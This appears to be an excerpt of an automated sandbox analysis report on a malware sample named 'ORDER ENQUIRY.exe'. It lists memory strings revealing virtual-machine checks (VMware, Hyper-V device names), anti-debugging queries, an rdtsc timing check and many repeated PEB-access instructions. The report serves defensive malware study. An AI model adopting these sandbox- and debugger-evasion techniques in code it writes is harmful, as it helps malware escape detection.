Source: explorer.exe, 00000004.00000000.2114025669.0000000009B90000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.2100807606.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000004.00000000.2114025669.0000000009B90000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000004.00000002.4550702238.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 00000004.00000000.2100807606.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000004.00000002.4553917152.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 00000004.00000002.4556219779.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000000.2100807606.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000004.00000000.2100807606.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: explorer.exe, 00000004.00000000.2114025669.0000000009B90000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000004.00000000.2114025669.0000000009B90000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: explorer.exe, 00000004.00000002.4550702238.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000004.00000002.4556219779.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.4553917152.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe

Code function: 3_2_00409AA0 rdtsc

3_2_00409AA0

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe

Code function: 3_2_0040ACE0 LdrLoadDll,

3_2_0040ACE0

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF0185 mov eax, dword ptr fs:[00000030h]	3_2_01AF0185
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3019F mov eax, dword ptr fs:[00000030h]	3_2_01B3019F
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3019F mov eax, dword ptr fs:[00000030h]	3_2_01B3019F
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3019F mov eax, dword ptr fs:[00000030h]	3_2_01B3019F
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3019F mov eax, dword ptr fs:[00000030h]	3_2_01B3019F
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B54180 mov eax, dword ptr fs:[00000030h]	3_2_01B54180
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B54180 mov eax, dword ptr fs:[00000030h]	3_2_01B54180
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AAA197 mov eax, dword ptr fs:[00000030h]	3_2_01AAA197
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AAA197 mov eax, dword ptr fs:[00000030h]	3_2_01AAA197
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AAA197 mov eax, dword ptr fs:[00000030h]	3_2_01AAA197
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B6C188 mov eax, dword ptr fs:[00000030h]	3_2_01B6C188
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B6C188 mov eax, dword ptr fs:[00000030h]	3_2_01B6C188
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE01F8 mov eax, dword ptr fs:[00000030h]	3_2_01AE01F8
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B861E5 mov eax, dword ptr fs:[00000030h]	3_2_01B861E5
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2E1D0 mov eax, dword ptr fs:[00000030h]	3_2_01B2E1D0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2E1D0 mov eax, dword ptr fs:[00000030h]	3_2_01B2E1D0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2E1D0 mov ecx, dword ptr fs:[00000030h]	3_2_01B2E1D0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2E1D0 mov eax, dword ptr fs:[00000030h]	3_2_01B2E1D0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2E1D0 mov eax, dword ptr fs:[00000030h]	3_2_01B2E1D0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B761C3 mov eax, dword ptr fs:[00000030h]	3_2_01B761C3
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B761C3 mov eax, dword ptr fs:[00000030h]	3_2_01B761C3
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE0124 mov eax, dword ptr fs:[00000030h]	3_2_01AE0124
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B70115 mov eax, dword ptr fs:[00000030h]	3_2_01B70115
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5A118 mov ecx, dword ptr fs:[00000030h]	3_2_01B5A118
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5A118 mov eax, dword ptr fs:[00000030h]	3_2_01B5A118
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5A118 mov eax, dword ptr fs:[00000030h]	3_2_01B5A118
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5A118 mov eax, dword ptr fs:[00000030h]	3_2_01B5A118
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]	3_2_01B5E10E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5E10E mov ecx, dword ptr fs:[00000030h]	3_2_01B5E10E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]	3_2_01B5E10E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]	3_2_01B5E10E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5E10E mov ecx, dword ptr fs:[00000030h]	3_2_01B5E10E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]	3_2_01B5E10E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]	3_2_01B5E10E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5E10E mov ecx, dword ptr fs:[00000030h]	3_2_01B5E10E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]	3_2_01B5E10E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5E10E mov ecx, dword ptr fs:[00000030h]	3_2_01B5E10E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B84164 mov eax, dword ptr fs:[00000030h]	3_2_01B84164
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B84164 mov eax, dword ptr fs:[00000030h]	3_2_01B84164
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B48158 mov eax, dword ptr fs:[00000030h]	3_2_01B48158
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B44144 mov eax, dword ptr fs:[00000030h]	3_2_01B44144
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B44144 mov eax, dword ptr fs:[00000030h]	3_2_01B44144
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B44144 mov ecx, dword ptr fs:[00000030h]	3_2_01B44144
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B44144 mov eax, dword ptr fs:[00000030h]	3_2_01B44144
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B44144 mov eax, dword ptr fs:[00000030h]	3_2_01B44144
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AAC156 mov eax, dword ptr fs:[00000030h]	3_2_01AAC156
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB6154 mov eax, dword ptr fs:[00000030h]	3_2_01AB6154
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB6154 mov eax, dword ptr fs:[00000030h]	3_2_01AB6154
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AA80A0 mov eax, dword ptr fs:[00000030h]	3_2_01AA80A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B760B8 mov eax, dword ptr fs:[00000030h]	3_2_01B760B8
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B760B8 mov ecx, dword ptr fs:[00000030h]	3_2_01B760B8
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B480A8 mov eax, dword ptr fs:[00000030h]	3_2_01B480A8
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB208A mov eax, dword ptr fs:[00000030h]	3_2_01AB208A
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB80E9 mov eax, dword ptr fs:[00000030h]	3_2_01AB80E9
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AAA0E3 mov ecx, dword ptr fs:[00000030h]	3_2_01AAA0E3
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B360E0 mov eax, dword ptr fs:[00000030h]	3_2_01B360E0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AAC0F0 mov eax, dword ptr fs:[00000030h]	3_2_01AAC0F0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF20F0 mov ecx, dword ptr fs:[00000030h]	3_2_01AF20F0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B320DE mov eax, dword ptr fs:[00000030h]	3_2_01B320DE
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B46030 mov eax, dword ptr fs:[00000030h]	3_2_01B46030
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AAA020 mov eax, dword ptr fs:[00000030h]	3_2_01AAA020
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AAC020 mov eax, dword ptr fs:[00000030h]	3_2_01AAC020
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B34000 mov ecx, dword ptr fs:[00000030h]	3_2_01B34000
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]	3_2_01B52000
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]	3_2_01B52000
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]	3_2_01B52000
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]	3_2_01B52000
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]	3_2_01B52000
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]	3_2_01B52000
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]	3_2_01B52000
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]	3_2_01B52000
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ACE016 mov eax, dword ptr fs:[00000030h]	3_2_01ACE016
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ACE016 mov eax, dword ptr fs:[00000030h]	3_2_01ACE016
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ACE016 mov eax, dword ptr fs:[00000030h]	3_2_01ACE016
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ACE016 mov eax, dword ptr fs:[00000030h]	3_2_01ACE016
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADC073 mov eax, dword ptr fs:[00000030h]	3_2_01ADC073
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B36050 mov eax, dword ptr fs:[00000030h]	3_2_01B36050
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB2050 mov eax, dword ptr fs:[00000030h]	3_2_01AB2050
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AAE388 mov eax, dword ptr fs:[00000030h]	3_2_01AAE388
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AAE388 mov eax, dword ptr fs:[00000030h]	3_2_01AAE388
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AAE388 mov eax, dword ptr fs:[00000030h]	3_2_01AAE388
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD438F mov eax, dword ptr fs:[00000030h]	3_2_01AD438F
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD438F mov eax, dword ptr fs:[00000030h]	3_2_01AD438F
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AA8397 mov eax, dword ptr fs:[00000030h]	3_2_01AA8397
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AA8397 mov eax, dword ptr fs:[00000030h]	3_2_01AA8397
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AA8397 mov eax, dword ptr fs:[00000030h]	3_2_01AA8397
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]	3_2_01AC03E9
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]	3_2_01AC03E9
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]	3_2_01AC03E9
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]	3_2_01AC03E9
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]	3_2_01AC03E9
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]	3_2_01AC03E9
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]	3_2_01AC03E9
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]	3_2_01AC03E9
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE63FF mov eax, dword ptr fs:[00000030h]	3_2_01AE63FF
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ACE3F0 mov eax, dword ptr fs:[00000030h]	3_2_01ACE3F0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ACE3F0 mov eax, dword ptr fs:[00000030h]	3_2_01ACE3F0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ACE3F0 mov eax, dword ptr fs:[00000030h]	3_2_01ACE3F0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B543D4 mov eax, dword ptr fs:[00000030h]	3_2_01B543D4
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B543D4 mov eax, dword ptr fs:[00000030h]	3_2_01B543D4
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABA3C0 mov eax, dword ptr fs:[00000030h]	3_2_01ABA3C0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABA3C0 mov eax, dword ptr fs:[00000030h]	3_2_01ABA3C0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABA3C0 mov eax, dword ptr fs:[00000030h]	3_2_01ABA3C0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABA3C0 mov eax, dword ptr fs:[00000030h]	3_2_01ABA3C0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABA3C0 mov eax, dword ptr fs:[00000030h]	3_2_01ABA3C0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABA3C0 mov eax, dword ptr fs:[00000030h]	3_2_01ABA3C0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB83C0 mov eax, dword ptr fs:[00000030h]	3_2_01AB83C0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB83C0 mov eax, dword ptr fs:[00000030h]	3_2_01AB83C0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB83C0 mov eax, dword ptr fs:[00000030h]	3_2_01AB83C0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB83C0 mov eax, dword ptr fs:[00000030h]	3_2_01AB83C0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5E3DB mov eax, dword ptr fs:[00000030h]	3_2_01B5E3DB
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5E3DB mov eax, dword ptr fs:[00000030h]	3_2_01B5E3DB
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5E3DB mov ecx, dword ptr fs:[00000030h]	3_2_01B5E3DB
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5E3DB mov eax, dword ptr fs:[00000030h]	3_2_01B5E3DB
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B363C0 mov eax, dword ptr fs:[00000030h]	3_2_01B363C0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B6C3CD mov eax, dword ptr fs:[00000030h]	3_2_01B6C3CD
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B88324 mov eax, dword ptr fs:[00000030h]	3_2_01B88324
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B88324 mov ecx, dword ptr fs:[00000030h]	3_2_01B88324
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B88324 mov eax, dword ptr fs:[00000030h]	3_2_01B88324
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B88324 mov eax, dword ptr fs:[00000030h]	3_2_01B88324
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEA30B mov eax, dword ptr fs:[00000030h]	3_2_01AEA30B
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEA30B mov eax, dword ptr fs:[00000030h]	3_2_01AEA30B
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEA30B mov eax, dword ptr fs:[00000030h]	3_2_01AEA30B
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AAC310 mov ecx, dword ptr fs:[00000030h]	3_2_01AAC310
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD0310 mov ecx, dword ptr fs:[00000030h]	3_2_01AD0310
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5437C mov eax, dword ptr fs:[00000030h]	3_2_01B5437C
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B7A352 mov eax, dword ptr fs:[00000030h]	3_2_01B7A352
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B58350 mov ecx, dword ptr fs:[00000030h]	3_2_01B58350
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3035C mov eax, dword ptr fs:[00000030h]	3_2_01B3035C
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3035C mov eax, dword ptr fs:[00000030h]	3_2_01B3035C
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3035C mov eax, dword ptr fs:[00000030h]	3_2_01B3035C
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3035C mov ecx, dword ptr fs:[00000030h]	3_2_01B3035C
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3035C mov eax, dword ptr fs:[00000030h]	3_2_01B3035C
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3035C mov eax, dword ptr fs:[00000030h]	3_2_01B3035C
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B8634F mov eax, dword ptr fs:[00000030h]	3_2_01B8634F
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]	3_2_01B32349
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]	3_2_01B32349
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]	3_2_01B32349
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]	3_2_01B32349
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]	3_2_01B32349
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]	3_2_01B32349
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]	3_2_01B32349
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]	3_2_01B32349
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]	3_2_01B32349
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]	3_2_01B32349
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]	3_2_01B32349
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]	3_2_01B32349
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]	3_2_01B32349
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]	3_2_01B32349
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]	3_2_01B32349
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC02A0 mov eax, dword ptr fs:[00000030h]	3_2_01AC02A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC02A0 mov eax, dword ptr fs:[00000030h]	3_2_01AC02A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B462A0 mov eax, dword ptr fs:[00000030h]	3_2_01B462A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B462A0 mov ecx, dword ptr fs:[00000030h]	3_2_01B462A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B462A0 mov eax, dword ptr fs:[00000030h]	3_2_01B462A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B462A0 mov eax, dword ptr fs:[00000030h]	3_2_01B462A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B462A0 mov eax, dword ptr fs:[00000030h]	3_2_01B462A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B462A0 mov eax, dword ptr fs:[00000030h]	3_2_01B462A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEE284 mov eax, dword ptr fs:[00000030h]	3_2_01AEE284
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEE284 mov eax, dword ptr fs:[00000030h]	3_2_01AEE284
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B30283 mov eax, dword ptr fs:[00000030h]	3_2_01B30283
